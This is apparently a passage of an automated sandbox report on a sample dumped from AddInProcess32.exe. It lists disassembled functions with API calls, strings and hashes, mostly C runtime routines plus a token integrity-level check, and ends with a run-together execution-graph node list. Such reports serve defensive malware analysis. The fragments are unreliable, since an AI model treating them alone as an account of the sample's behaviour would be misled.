                                                                                                            • Opcode Fuzzy Hash: 8e68faa92370a965529a53a4b1aa1c85c9262d97b1e5eff1d9fa127d797ae8c1
                                                                                                            • Instruction Fuzzy Hash: 24B18C71900209DFCF15DFA5CA809AEBBB5BF24314B14416FE8847B292DB38DE51CB99
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408577
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040857F
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408608
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00408633
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408688
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: Fx@$csm
                                                                                                            • API String ID: 1170836740-2757198800
                                                                                                            • Opcode ID: d5ac8604d01ac333208a0c338073ae2a7e5e8417fecfc79e808da464ea9234f0
                                                                                                            • Instruction ID: 4b04f8770cba5fb961b9531c7f3f38ae8059c37cde7f09dcab7eeb7c3de7790a
                                                                                                            • Opcode Fuzzy Hash: d5ac8604d01ac333208a0c338073ae2a7e5e8417fecfc79e808da464ea9234f0
                                                                                                            • Instruction Fuzzy Hash: F441B434A00208ABCF10DF69CD80A9F7BB5AF45318F14856EE8547B3D2DB399E05CB99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3213747228-0
                                                                                                            • Opcode ID: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                                                                            • Instruction ID: a4d7e44a4c022d8882bf4dd48d55e7a8210e846d2bdd9f8f1f0772ce1768a2f9
                                                                                                            • Opcode Fuzzy Hash: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                                                                            • Instruction Fuzzy Hash: EBB14772A002559FDB118F66CC81BAF7BA5EF55310F1845BBE900BB3C2D6789911C7A8
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,004112F2,A2C859C2,0000044C,00000000,00000000,?,?,0041144C,00000022,FlsSetValue,0041B244,0041B24C,00000000), ref: 004112A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                            • API String ID: 3664257935-537541572
                                                                                                            • Opcode ID: 13a807f08e4b2fbc4e7545eb37dd9819c29e6cd604fa78f32b9a5c44f0425b79
                                                                                                            • Instruction ID: c0ad62dc533ac1c9702fca9f15d615497be0f29348a61bc39096ef7b92af5ca6
                                                                                                            • Opcode Fuzzy Hash: 13a807f08e4b2fbc4e7545eb37dd9819c29e6cd604fa78f32b9a5c44f0425b79
                                                                                                            • Instruction Fuzzy Hash: 77213571A00111ABDB219B64EC41ADB3768DF11760B2441B2EE01F33E0E738EE41C6E8
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A2C859C2,?,?,00000000,0041861B,000000FF,?,0040CFE3,0040D0C7,?,0040CFB7,00000000), ref: 0040D03C
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040D04E
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0041861B,000000FF,?,0040CFE3,0040D0C7,?,0040CFB7,00000000), ref: 0040D070
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$Fx@$mscoree.dll
                                                                                                            • API String ID: 4061214504-3622240814
                                                                                                            • Opcode ID: 1dd3a9f09780d5505d8a5deabc52c5b76dbfc48eb79c1825561cdbebbcdc7d9a
                                                                                                            • Instruction ID: 1e0bd15e481942e97fccbb05080ab9fff33d04de5ccb01f5a471313bdd3020fe
                                                                                                            • Opcode Fuzzy Hash: 1dd3a9f09780d5505d8a5deabc52c5b76dbfc48eb79c1825561cdbebbcdc7d9a
                                                                                                            • Instruction Fuzzy Hash: 4701A771D44615BBDB118F90DC09FEE77B8FB44B14F004536E811A26D0DB789D41CA94
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,0040897B,004084E3,00407A61), ref: 00408992
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004089A0
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004089B9
                                                                                                            • SetLastError.KERNEL32(00000000,0040897B,004084E3,00407A61), ref: 00408A0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 8132ab8049597a0f0152600f2776cfcb933c90011c11b07c1ff3681c1354b7b8
                                                                                                            • Instruction ID: 43b54b935d4b9e744eb9404515c8c9fd3ba714462d7fc6ace75c42498f54b02a
                                                                                                            • Opcode Fuzzy Hash: 8132ab8049597a0f0152600f2776cfcb933c90011c11b07c1ff3681c1354b7b8
                                                                                                            • Instruction Fuzzy Hash: C901F172718321AEE62426B57E86A372B98FB01778320023FF250711E2EE7A5C02964D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustPointer
                                                                                                            • String ID: Fx@
                                                                                                            • API String ID: 1740715915-443324942
                                                                                                            • Opcode ID: f356ca3b56f828ee56c995e93dcfd931e3dc3b5137f2536b59d7325e1164e694
                                                                                                            • Instruction ID: 1a91d038004f6b70e2135f66d810801dd4f272973a1585a6dedaf1d3ec640edd
                                                                                                            • Opcode Fuzzy Hash: f356ca3b56f828ee56c995e93dcfd931e3dc3b5137f2536b59d7325e1164e694
                                                                                                            • Instruction Fuzzy Hash: C351C1B26057069FDB288F11DA41B6B77B4EF50310F14403FE982672D2DB39AD41CB99
                                                                                                            APIs
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00414655
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0041471E
                                                                                                            • __freea.LIBCMT ref: 00414785
                                                                                                              • Part of subcall function 0040DC7F: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0040718C,00000000,?,00406E07,0000044C,A2C859C2,7591F380,00000000,00000000,000000FF,?,004014D5), ref: 0040DCB1
                                                                                                            • __freea.LIBCMT ref: 00414798
                                                                                                            • __freea.LIBCMT ref: 004147A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1423051803-0
                                                                                                            • Opcode ID: 1a80283c2e70fa09d16cf5d20edefe239e97a8433d9138ed18d4ed888f15a10c
                                                                                                            • Instruction ID: f3167d8e0243dde5af78ebf6985aeb94451484d05d6fe71b4df8962cd1e256b5
                                                                                                            • Opcode Fuzzy Hash: 1a80283c2e70fa09d16cf5d20edefe239e97a8433d9138ed18d4ed888f15a10c
                                                                                                            • Instruction Fuzzy Hash: 2151D872600206AFDB105FA1CC81EFB77A9EFC5714B29012EFD18D6290EB7CCC918668
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00409A53,00000000,?,00422CE0,?,?,?,00409BF6,00000004,InitializeCriticalSectionEx,00419D38,InitializeCriticalSectionEx), ref: 00409AAF
                                                                                                            • GetLastError.KERNEL32(?,00409A53,00000000,?,00422CE0,?,?,?,00409BF6,00000004,InitializeCriticalSectionEx,00419D38,InitializeCriticalSectionEx,00000000,?,004099AD), ref: 00409AB9
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00409AE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                            • Opcode ID: 887137ae3bc163b28a7465307e1ce3841d78868984676ccdf104f65e9dca045b
                                                                                                            • Instruction ID: a9cb1dfa298960d4fc1fe79fea012a7061f96a57943c0fde9da82d5a9a66ae8d
                                                                                                            • Opcode Fuzzy Hash: 887137ae3bc163b28a7465307e1ce3841d78868984676ccdf104f65e9dca045b
                                                                                                            • Instruction Fuzzy Hash: 81E01230B80205B7EF101BB1DC0AB5B3E549B01B50F108031F90CB41E2D775DC51999C
                                                                                                            APIs
                                                                                                            • GetConsoleOutputCP.KERNEL32(A2C859C2,00000000,00000000,?), ref: 00414B00
                                                                                                              • Part of subcall function 00410654: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0041477B,?,00000000,-00000008), ref: 004106B5
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414D52
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00414D98
                                                                                                            • GetLastError.KERNEL32 ref: 00414E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2112829910-0
                                                                                                            • Opcode ID: 60c5f054869722d532b1ea41e6caa76b28aab3d5ffe9f6e32e54c6c4c81700e4
                                                                                                            • Instruction ID: 9bc72cc52f421f30e8f6abcc0f4d52d0e1568dee037a441d4163aa1fce023b62
                                                                                                            • Opcode Fuzzy Hash: 60c5f054869722d532b1ea41e6caa76b28aab3d5ffe9f6e32e54c6c4c81700e4
                                                                                                            • Instruction Fuzzy Hash: ECD1BF75E042489FCF15CFA8D980AEDBBB5FF49304F28452AE816EB351D734A982CB54
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 004024CC
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004024D3
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004024F3
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 215268677-0
                                                                                                            • Opcode ID: 7b3405532f9736eb91037f93771a703fff670887a10e780259bd6e5a192c338a
                                                                                                            • Instruction ID: 198d9e17ccfe2a7ad384e8d2e913a2c16111d73c4ba0bcf3ee50cad862497ac3
                                                                                                            • Opcode Fuzzy Hash: 7b3405532f9736eb91037f93771a703fff670887a10e780259bd6e5a192c338a
                                                                                                            • Instruction Fuzzy Hash: 8201CD71A0021CABDB10DFA4DD59AAEBBB8FF08705F414569EA11E7190DB709E04CB98
                                                                                                            APIs
                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000), ref: 004171CD
                                                                                                            • GetLastError.KERNEL32(?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?,?,?,00415432,00000000), ref: 004171D9
                                                                                                              • Part of subcall function 0041719F: CloseHandle.KERNEL32(FFFFFFFE,004171E9,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?,?), ref: 004171AF
                                                                                                            • ___initconout.LIBCMT ref: 004171E9
                                                                                                              • Part of subcall function 00417161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00417190,0041630D,?,?,00414E8F,?,00000000,00000000,?), ref: 00417174
                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?), ref: 004171FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                            • String ID:
                                                                                                            • API String ID: 2744216297-0
                                                                                                            • Opcode ID: 3d0c5046cf9d2e0f6704021f6f3b3043e657957f714e9acfb99967feb644a5d5
                                                                                                            • Instruction ID: b0767d8cb09f9060a6b35dd9a6a9e5853ba024826434936985c186be5aa50d1e
                                                                                                            • Opcode Fuzzy Hash: 3d0c5046cf9d2e0f6704021f6f3b3043e657957f714e9acfb99967feb644a5d5
                                                                                                            • Instruction Fuzzy Hash: 21F0AC36505114BBCF226F95EC04ADA3F76FF093A1F558165FA1895230CA72CC61DB98
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$h-B
                                                                                                            • API String ID: 0-3472261264
                                                                                                            • Opcode ID: c595d2888e0eb11efb4b34618ed25aba47e01962a251bf0eaadfb82c9e146fa7
                                                                                                            • Instruction ID: fa767d83c2e4f49978a6e0558d888f3b8fd6f7704c6049fb9866f05cc0fb7e2c
                                                                                                            • Opcode Fuzzy Hash: c595d2888e0eb11efb4b34618ed25aba47e01962a251bf0eaadfb82c9e146fa7
                                                                                                            • Instruction Fuzzy Hash: A531A572E04214EFDB21EF9598C199FBBB8EB48354B50417BF805B7281DA788E05CB9C
                                                                                                            APIs
                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00409085
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                            • Opcode ID: f38d9cb25aa6dfc8a72ca3406d5f2338f5c32c31393292f4011166daf61a950d
                                                                                                            • Instruction ID: 4ac13803e4d5ca742f2069cf5601cbd93e777c9f887da7f4d15751ecf4808dc5
                                                                                                            • Opcode Fuzzy Hash: f38d9cb25aa6dfc8a72ca3406d5f2338f5c32c31393292f4011166daf61a950d
                                                                                                            • Instruction Fuzzy Hash: D241BA71A0020AAFDF16CF94CD81AEEBBB1BF48304F1480AAF9057B292D3399D51DB55
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00406FA8
                                                                                                            • ___raise_securityfailure.LIBCMT ref: 00407090
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                            • String ID: X)B
                                                                                                            • API String ID: 3761405300-1098520909
                                                                                                            • Opcode ID: 7660bb6e8ad02ded4dac60b132e9aeee3ab913c4838ec0a0fbf2420198f39870
                                                                                                            • Instruction ID: edf480fd9900d96946d1fb7b902f312f2e1ee033d1a97d8879616f167246f57c
                                                                                                            • Opcode Fuzzy Hash: 7660bb6e8ad02ded4dac60b132e9aeee3ab913c4838ec0a0fbf2420198f39870
                                                                                                            • Instruction Fuzzy Hash: 6421BFB5701305AAE734CF15FA86A617BA4BB08354F90503AE5099AEB0D3F49A92CF4D
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004070AE
                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0040716B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                            • String ID: X)B
                                                                                                            • API String ID: 3761405300-1098520909
                                                                                                            • Opcode ID: 4ca52ba7993b1bf8668e0bc1dcae837b018e0a703b76ddd744c5681627d506fe
                                                                                                            • Instruction ID: 539942d66ec76249163cc16820ef38eeed5544e5010e9a3f47c3daf008d588c5
                                                                                                            • Opcode Fuzzy Hash: 4ca52ba7993b1bf8668e0bc1dcae837b018e0a703b76ddd744c5681627d506fe
                                                                                                            • Instruction Fuzzy Hash: 34119CB5B11245ABDB34CF15EA856517BA4BB08340B80603AE80997FB0E7F09A97CF4D
                                                                                                            APIs
                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0040F3AB), ref: 004114B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                            • String ID: Fx@$InitializeCriticalSectionEx
                                                                                                            • API String ID: 2593887523-448776849
                                                                                                            • Opcode ID: e87d91127952a8dc22b5428e2afc5b15bddff06ead816acb92f64444e91ac5d6
                                                                                                            • Instruction ID: 8c4a806392b081a594d943fa2f9f988a49f1e782b074da32be5c716ced234856
                                                                                                            • Opcode Fuzzy Hash: e87d91127952a8dc22b5428e2afc5b15bddff06ead816acb92f64444e91ac5d6
                                                                                                            • Instruction Fuzzy Hash: 50E09235580229BBCB122F41EC19EDE3F11EF40BA0B158022FE1C15171C77A8CA1D6DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Alloc
                                                                                                            • String ID: FlsAlloc$Fx@
                                                                                                            • API String ID: 2773662609-214802781
                                                                                                            • Opcode ID: 5dae29d0728023c45b54f6ed28715b5773cd5894d0ff809e6f4c406c58bfbcff
                                                                                                            • Instruction ID: 5cd6a7e703b151d4c349517ca756f394920c3fd9b28e445f9c2919a88c313ee0
                                                                                                            • Opcode Fuzzy Hash: 5dae29d0728023c45b54f6ed28715b5773cd5894d0ff809e6f4c406c58bfbcff
                                                                                                            • Instruction Fuzzy Hash: FCE0C231A803297397112791BC0EAEE7E05CB44F60B2440B3FF2DA26A5DABA4CC155DE

                                                                                                            Execution Graph

                                                                                                            Execution Coverage: 4.5%
                                                                                                            Dynamic/Decrypted Code Coverage: 0%
                                                                                                            Signature Coverage: 12.1%
                                                                                                            Total number of Nodes: 2000
                                                                                                            Total number of Limit Nodes: 76
_memset 119256->119257 119257->119184 119259 1110c4b0 std::_Mutex::_Mutex 265 API calls 119258->119259 119260 11089597 119259->119260 119261 110895b9 InitializeCriticalSection 119260->119261 119262 1110c4b0 std::_Mutex::_Mutex 265 API calls 119260->119262 119265 1108961a 119261->119265 119264 110895b2 119262->119264 119264->119261 119582 1115e87a 66 API calls std::exception::_Copy_str 119264->119582 119265->119196 119267 110895e9 119583 1115ecd1 RaiseException 119267->119583 119270 1115f7e6 119269->119270 119271 1115f7d1 119269->119271 119270->119271 119272 1115f7ed 119270->119272 119584 111659cf 66 API calls __getptd_noexit 119271->119584 119586 1116baca 102 API calls 11 library calls 119272->119586 119275 1115f7d6 119585 1116a5e4 11 API calls __tsopen_nolock 119275->119585 119276 1115f813 119278 110306d2 119276->119278 119587 1116b904 97 API calls 6 library calls 119276->119587 119280 11161b76 119278->119280 119281 11161b82 __tsopen_nolock 119280->119281 119282 11161ba3 119281->119282 119283 11161b8c 119281->119283 119285 11167e95 __getptd 66 API calls 119282->119285 119613 111659cf 66 API calls __getptd_noexit 119283->119613 119287 11161ba8 119285->119287 119286 11161b91 119614 1116a5e4 11 API calls __tsopen_nolock 119286->119614 119289 1116cb55 _localeconv 74 API calls 119287->119289 119290 11161bb2 119289->119290 119291 1116649e __calloc_crt 66 API calls 119290->119291 119292 11161bc8 119291->119292 119293 11161b9c __tsopen_nolock _setlocale 119292->119293 119294 1116fdec __lock 66 API calls 119292->119294 119293->119201 119295 11161bde 119294->119295 119588 11160fe4 119295->119588 119302 11161c0e __expandlocale 119305 1116fdec __lock 66 API calls 119302->119305 119303 11161cbf 119619 1116c924 8 API calls 119303->119619 119308 11161c34 119305->119308 119306 11161cc5 119620 1116c9bd 66 API calls 4 library calls 119306->119620 119615 1116cb08 74 API calls 3 library calls 119308->119615 119310 11161c46 119616 1116c924 8 API calls 119310->119616 119312 11161c4c 
119313 11161c6a 119312->119313 119617 1116cb08 74 API calls 3 library calls 119312->119617 119618 11161cb4 LeaveCriticalSection _doexit 119313->119618 119772 1113ee60 119316->119772 119318 11161e79 85 API calls std::_Mutex::_Mutex 119320 1113ef65 119318->119320 119319 1113ee60 IsDBCSLeadByte 119319->119320 119320->119318 119320->119319 119321 11030708 119320->119321 119321->119204 119323 11060230 293 API calls 119322->119323 119324 110605fe 119323->119324 119325 1110c4b0 std::_Mutex::_Mutex 265 API calls 119324->119325 119326 1106062b 119325->119326 119327 11060644 119326->119327 119328 11060230 293 API calls 119326->119328 119329 1110c4b0 std::_Mutex::_Mutex 265 API calls 119327->119329 119328->119327 119330 11060655 119329->119330 119331 11060230 293 API calls 119330->119331 119333 1106066e 119330->119333 119331->119333 119332 11030753 119332->119208 119332->119209 119333->119332 119784 1113e630 119333->119784 119335 11060696 119793 11060590 119335->119793 119342 110cb7c9 119341->119342 119343 110307c6 119341->119343 119912 11140be0 GetSystemMetrics GetSystemMetrics 119342->119912 119343->119213 119345 110cb7d0 std::_Mutex::_Mutex 119345->119343 119346 110cb7de CreateWindowExA 119345->119346 119346->119343 119347 110cb808 SetClassLongA 119346->119347 119347->119343 119349 1110c4b0 std::_Mutex::_Mutex 265 API calls 119348->119349 119350 11122024 119349->119350 119351 11122055 119350->119351 119352 1112203a 119350->119352 119913 11121220 119351->119913 119959 11075410 464 API calls std::_Mutex::_Mutex 119352->119959 119400->119173 119402 1110c4b0 std::_Mutex::_Mutex 265 API calls 119401->119402 119403 11060281 119402->119403 119404 11060297 InitializeCriticalSection 119403->119404 121065 1105fd30 266 API calls 3 library calls 119403->121065 119407 110602d7 119404->119407 119408 11060346 119404->119408 121066 1105e3b0 287 API calls 3 library calls 119407->121066 119408->119208 119410 110602f8 RegCreateKeyExA 119411 11060352 RegCreateKeyExA 119410->119411 119412 
1106031f RegCreateKeyExA 119410->119412 119411->119408 119412->119408 119412->119411 119415 1115fd44 119414->119415 119418 1115fb00 119415->119418 119430 1115fa79 119418->119430 119420 1115fb24 119438 111659cf 66 API calls __getptd_noexit 119420->119438 119423 1115fb29 119439 1116a5e4 11 API calls __tsopen_nolock 119423->119439 119426 1115fb5a 119428 1115fba1 119426->119428 119440 1116d2b2 79 API calls 3 library calls 119426->119440 119427 11030225 119427->119169 119428->119427 119441 111659cf 66 API calls __getptd_noexit 119428->119441 119431 1115fa8c 119430->119431 119437 1115fad9 119430->119437 119442 11167e95 119431->119442 119434 1115fab9 119434->119437 119462 1116cdf1 68 API calls 6 library calls 119434->119462 119437->119420 119437->119426 119438->119423 119439->119427 119440->119426 119441->119427 119463 11167e1c GetLastError 119442->119463 119444 11167e9d 119445 1115fa91 119444->119445 119477 11169e8a 66 API calls 3 library calls 119444->119477 119445->119434 119447 1116cb55 119445->119447 119448 1116cb61 __tsopen_nolock 119447->119448 119449 11167e95 __getptd 66 API calls 119448->119449 119450 1116cb66 119449->119450 119451 1116cb94 119450->119451 119453 1116cb78 119450->119453 119507 1116fdec 119451->119507 119455 11167e95 __getptd 66 API calls 119453->119455 119454 1116cb9b 119514 1116cb08 74 API calls 3 library calls 119454->119514 119457 1116cb7d 119455->119457 119460 1116cb8b __tsopen_nolock 119457->119460 119506 11169e8a 66 API calls 3 library calls 119457->119506 119458 1116cbaf 119515 1116cbc2 LeaveCriticalSection _doexit 119458->119515 119460->119434 119462->119437 119478 11167cda TlsGetValue 119463->119478 119466 11167e89 SetLastError 119466->119444 119469 11167e4f DecodePointer 119470 11167e64 119469->119470 119471 11167e80 119470->119471 119472 11167e68 119470->119472 119488 1115f2c5 119471->119488 119487 11167d68 66 API calls 4 library calls 119472->119487 119475 11167e70 GetCurrentThreadId 119475->119466 119476 11167e86 119476->119466 119479 
11167cef DecodePointer TlsSetValue 119478->119479 119480 11167d0a 119478->119480 119479->119480 119480->119466 119481 1116649e 119480->119481 119484 111664a7 119481->119484 119483 111664e4 119483->119466 119483->119469 119484->119483 119485 111664c5 Sleep 119484->119485 119494 1116c813 119484->119494 119486 111664da 119485->119486 119486->119483 119486->119484 119487->119475 119489 1115f2d0 HeapFree 119488->119489 119493 1115f2f9 __dosmaperr 119488->119493 119490 1115f2e5 119489->119490 119489->119493 119505 111659cf 66 API calls __getptd_noexit 119490->119505 119492 1115f2eb GetLastError 119492->119493 119493->119476 119495 1116c81f 119494->119495 119501 1116c83a 119494->119501 119496 1116c82b 119495->119496 119495->119501 119503 111659cf 66 API calls __getptd_noexit 119496->119503 119498 1116c84d RtlAllocateHeap 119500 1116c874 119498->119500 119498->119501 119499 1116c830 119499->119484 119500->119484 119501->119498 119501->119500 119504 11169b88 DecodePointer 119501->119504 119503->119499 119504->119501 119505->119492 119508 1116fe14 EnterCriticalSection 119507->119508 119509 1116fe01 119507->119509 119508->119454 119516 1116fd2a 119509->119516 119511 1116fe07 119511->119508 119543 11169e8a 66 API calls 3 library calls 119511->119543 119514->119458 119515->119457 119517 1116fd36 __tsopen_nolock 119516->119517 119518 1116fd46 119517->119518 119519 1116fd5e 119517->119519 119544 1116a07d 66 API calls 2 library calls 119518->119544 119528 1116fd6c __tsopen_nolock 119519->119528 119547 11166459 119519->119547 119522 1116fd4b 119545 11169ece 66 API calls 7 library calls 119522->119545 119525 1116fd52 119546 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 119525->119546 119526 1116fd7e 119553 111659cf 66 API calls __getptd_noexit 119526->119553 119527 1116fd8d 119531 1116fdec __lock 65 API calls 119527->119531 119528->119511 119533 1116fd94 119531->119533 119534 1116fdc7 119533->119534 119535 1116fd9c InitializeCriticalSectionAndSpinCount 
